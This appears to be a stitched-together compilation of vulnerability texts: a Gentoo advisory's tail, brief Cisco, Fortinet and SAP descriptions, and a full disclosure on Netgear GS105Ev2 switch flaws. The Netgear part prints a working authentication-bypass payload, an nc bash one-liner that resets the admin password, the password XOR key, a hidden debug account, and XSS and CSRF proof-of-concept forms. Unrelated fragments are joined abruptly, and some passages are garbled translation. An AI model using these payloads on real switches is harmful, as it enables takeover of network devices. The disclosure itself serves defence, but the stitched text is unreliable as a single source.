http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Cisco IOS XR 5.1 allows remote attackers to cause a denial of service (DHCPv6 daemon crash) via a malformed DHCPv6 packet, aka Bug ID CSCuo59052. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture. Attackers can exploit this issue to cause the affected device to crash, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuo59052

The NETGEAR ProSafe Plus Configuration Utility creates configuration backup files containing cleartext passwords, which might allow remote attackers to obtain sensitive information by reading a file. Netgear Provided by ProSafe Plus Configuration Utility Has a function to back up the switch settings. CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.htmlA third party who can access the backup file may obtain the device management password. Attackers can exploit vulnerabilities to obtain sensitive information. # Multiple Vulnerabilities - Netgear GS105Ev2 ## Product Vendor: Netgear Model: GS105Ev2 Firmware version: 1.3.0.3,1.4.0.2 Reference: http://downloadcenter.netgear.com/de/product/GS105Ev2#searchResults Netgear GS105Ev2 is a Gigabit switch with 5 ports targeting SMBs. ## Status/Metrics/Identifier Status: unfixed CVSS v2 Vector: (AV:A/AC:L/Au:N/C:C/I:C/A:C) CVSS Score: 8.3 CVE-ID: n/A The highest risk is represented by the authentication bypass. This is reflected by the score. ## Author/Credits Benedikt Westermann (T\xdcV Rheinland i-sec GmbH) ## Authentication bypass in NSDP The implementation of the NSDP on the GS105Ev2 (and possibly also other switches) is flawed. An attacker with access to the broadcast domain of the switch can bypass the authentication process. This allows the attacker to gain full control of the switch, i.e., he can modify a particular configuration or flash another firmware to the the switch. ### Detailed Description of the Vulnerability The NSDP is a simple stateless protocol. It consists of a header, a trailer, and a body consisting of an array of type-length-value triplets. The general structure is depicted below. /---------------------+----------------------\ | 1 byte: version | 1 byte: packet-type | +---------------------+----------------------+ | 2 bytes: result | 4 bytes: reserved | +---------------------+----------------------+ | 6 bytes: src mac | 6 byte: dest mac | +---------------------+----------------------+ | 2 bytes: reserved | 2 bytes: sequence no | +---------------------+----------------------+ | 4 bytes: signature | 2 bytes: reserved | +---------------------+----------------------+ | N bytes: TLV | 2 bytes: 0xFFFF | +---------------------+----------------------/ | 2 bytes: 0x0000 | \---------------------/ The TLV part is a sequence of type-length-value (TLV) triples. An entry has the following structure: /----------------+-------------------+---------------\ | 2 bytes: type | 2 bytes: length l| l bytes: data | \----------------+-------------------+---------------/ Regarding this vulnerability, the following two types are of special importance: Type 0x0009 - write password Type 0x9400 - unknown, but seems to indicate that no authentication is performed. By sending the following payload to the port 63322 to the IP of the GS105Ev2 switch, the password is changed to "test". |version|type|result|reserved |src-mac |dst-mac 01: 03 : 00:00: 00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc: |reserved|Sig. (NSDP) |TLV-type0x9400|TLV-type 0x0009 | Trailer 00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00 Hereby, the following part is of importance: 94:00:00:00:00:09:00:04:3a:11:14:06 The TLV 94:00:00:00 indicates a packet of type 94 with no payload. This followed by the TLV 00:09:00:04:3a:11:14:06. 0x0009 is the type "password change", 0x0004 is the length of the password, and 3a:11:14:06 is the "encrypted" password that is about to be set. The "encryption" of the password is done by XORing the password with the string "NtgrSmartSwitchRock". If the password is longer than the secret, the secret is used again. In case, the password has successfully be set, the switch replies with the following message: 01:04:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:00:00:00:00 If the message starts with this prefix 01:04:00:00, the password was changed successfully. This enables an attacker to gain access to the following configuration interfaces: - Web interface HTTP://<ip-of-switch>/login.cgi - Webinterface http://<ip-of-switch>/loginhidden.cgi with user: Admin1NtgrDebugUser (e.g.: - http://<ip-of-switch>/bootcode_update.cgi - http://<ip-of-switch>/produce_burn.cgi ) - Netgear Configuration utility With this, the configuration can be changed, e.g., enabling a monitoring port, or flashing a new firmware. The following bash script can be used to change the password to test: echo "Please enter IP of switch:"; read ip; echo "";echo "Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :"; read mac; echo "01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00" | sed "s/c0:ff:d4:ba:61:fc/$mac/g;s/://g" | xxd -r -p | nc -q 0 -b -u $ip 63322 For a switch with the IP 192.168.0.239 and the MAC c0:ff:d4:ba:61:fc, the output (and input) would look like this: Please enter IP of switch: 192.168.0.239 Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) : c0:ff:d4:ba:61:fc If the password is not changed, reboot the switch as this little bash script does not regard the SEQ number. It should be noted that the authentication bypass is not limited to the "set password" function. Other write functions are also affected by this vulnerability. Please note that the "encryption" scheme for the password is broken. The encryption string can easily be recovered by a simple XOR operation on a known password (NtgrSmartSwitchRock). Thus, an attacker within the broadcast domain can eavesdrop and decode the password. This fact was already noted in [Security by Obscurity bei Netgear Switches]. [Security by Obscurity bei Netgear Switches]: - http://www.linux-magazin.de/Blogs/Insecurity-Bulletin/Gastbeitrag-Security-by-Obscurity-bei-Netgear-Switches ## Multiple Vulnerabilities in Web-Interface Though we did not perform a full analysis of the web interface, we noticed that the web interface is prone to several vulnerabilities, i.e., XSS, CSRF, and insufficient protection of the password. ### Detailed Description of the Vulnerabilities #### XSS We noticed that the web interface does not properly encode the output. This allows reflected Cross-Site Scripting attacks. The issue can be reproduced with the following request: POST /switch_info.cgi HTTP/1.1 Host: 192.168.0.239 Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH Content-Type: application/x-www-form-urlencoded Content-Length: 110 switch_name='onclick=alert(1)&dhcpMode=0&ip_address='><Script>alert(&subnet_mask=1)</script>'&gateway_address= Alternatively, the following HTML-document can be opened to trigger the XSS. <html> <body> <form action="http://192.168.0.239/switch_info.cgi" method="POST"> <input type="hidden" name="switch&#95;name" value="Blubb" /> <input type="hidden" name="dhcpMode" value="0" /> <input type="hidden" name="ip&#95;address" value="&apos;&gt;&lt;Script&gt;alert&#40;" /> <input type="hidden" name="subnet&#95;mask" value="1&#41;&lt;&#47;script&gt;&apos;" /> <input type="hidden" name="gateway&#95;address" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> The following fields are affected: IP-Adresse, Netmask, Gateway Address. #### CSRF In addition, the web application has no protection against Cross-Site request forgery attacks. With the following PoC, the problem can be reproduced: <html> <body> <form action="http://192.168.0.239/switch_info.cgi" method="POST"> <input type="hidden" name="switch&#95;name" value="CSRF" /> <input type="hidden" name="dhcpMode" value="0" /> <input type="hidden" name="ip&#95;address" value="192&#46;168&#46;0&#46;239" /> <input type="hidden" name="subnet&#95;mask" value="255&#46;255&#46;255&#46;0" /> <input type="hidden" name="gateway&#95;address" value="192&#46;168&#46;0&#46;1" /> <input type="submit" value="Submit request" /> </form> </body> </html> #### Password Disclosure Moreover, the backup file of the configuration stores the password in plain, when the web interface is used to create the configuration (fixed with 1.4.0.2). The password, secretPass, is stored in plaintext in the configuration file: hexdump -C GS105Ev2.cfg 00000000 23 79 23 79 00 c0 a8 00 ef ff ff ff 00 c0 a8 00 |#y#y............| 00000010 01 00 00 00 00 00 00 61 64 6d 69 6e 00 00 00 00 |.......admin....| 00000020 73 65 63 72 65 74 50 61 73 73 00 00 00 00 00 00 |secretPass......| 00000030 00 00 00 00 00 00 0f ff f8 00 0f ff f8 00 0f ff |................| 00000040 f8 00 0f ff f8 00 0f ff f8 00 0f ff f8 00 0f ff |................| CVE-2014-4864 describes the problem for the NSDP protocol. #### Predictable Cookies Another issue is represented by the session ID which seems to be predictable and related to uptime of the switch. After the first login within a minute after power-on, the following session id is set by the switch. For each new login request, the switch was disconnected from the power supply and reconnected. After some time, the ID changes again. ##### Request 1 POST /login.cgi HTTP/1.1 Host: 192.168.0.239 Content-Type: application/x-www-form-urlencoded Content-Length: 13 password=test ##### Response 1 HTTP/1.1 200 OK Connection: close Content-Type: text/html Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/ Content-Length: 3454 ##### Request 2 POST /login.cgi HTTP/1.1 Host: 192.168.0.239 Content-Type: application/x-www-form-urlencoded Content-Length: 13 password=walla ##### Response 2 HTTP/1.1 200 OK Connection: close Content-Type: text/html Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/ Content-Length: 3454 ##### Request 3 POST /login.cgi HTTP/1.1 Host: 192.168.0.239 Content-Type: application/x-www-form-urlencoded Content-Length: 13 password=secretPass ##### Response 3 HTTP/1.1 200 OK Connection: close Content-Type: text/html Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/ Content-Length: 3454 ## Fixed Versions No updates are currently available. Password Disclosure: Fixed in version 1.4.0.2 ## History 10.08.2015 - Initial contact to Netgear via support chat 10.08.2015 - Set preliminary disclosure date 11.08.2015 - Netgear Support confirms findings 01.09.2015 - Netgear Support informs that currently no immediate plans exist to fix the issues 27.01.2016 - Public disclosure

The FortiManager protocol service in Fortinet FortiOS before 4.3.16 and 5.x before 5.0.8 on FortiGate devices does not prevent use of anonymous ciphersuites, which makes it easier for man-in-the-middle attackers to obtain sensitive information or interfere with communications by modifying the client-server data stream. Fortinet FortiGate and FortiWiFi appliances are susceptible to man-in-the-middle attacks (CWE-300) and a heap-based overflow vulnerability (CWE-122). In addition, JVNVU#96848844 Then CWE-300 and CWE-122 Published as. CWE-300: Channel Accessible by Non-Endpoint ('Man-in-the-Middle') http://cwe.mitre.org/data/definitions/300.html CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlMan-in-the-middle attack (man-in-the-middle attack) By changing the data stream between client and server, important information may be obtained or communication may be interrupted. Fortinet FortiOS is prone to an information-disclosure vulnerability. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits will lead to other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. There is a security vulnerability in the Fortinet FortiOS 4.3.15 and earlier versions and FortiManager protocol service of FortiManager 5.x versions earlier than 5.0.8 on FortiGate devices. The vulnerability stems from the fact that the program does not verify the use of anonymous cipher suites

SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. An integer overflow vulnerability exists in SAP NetWeaver Dispatcher. An attacker exploits a vulnerability to conduct a denial of service attack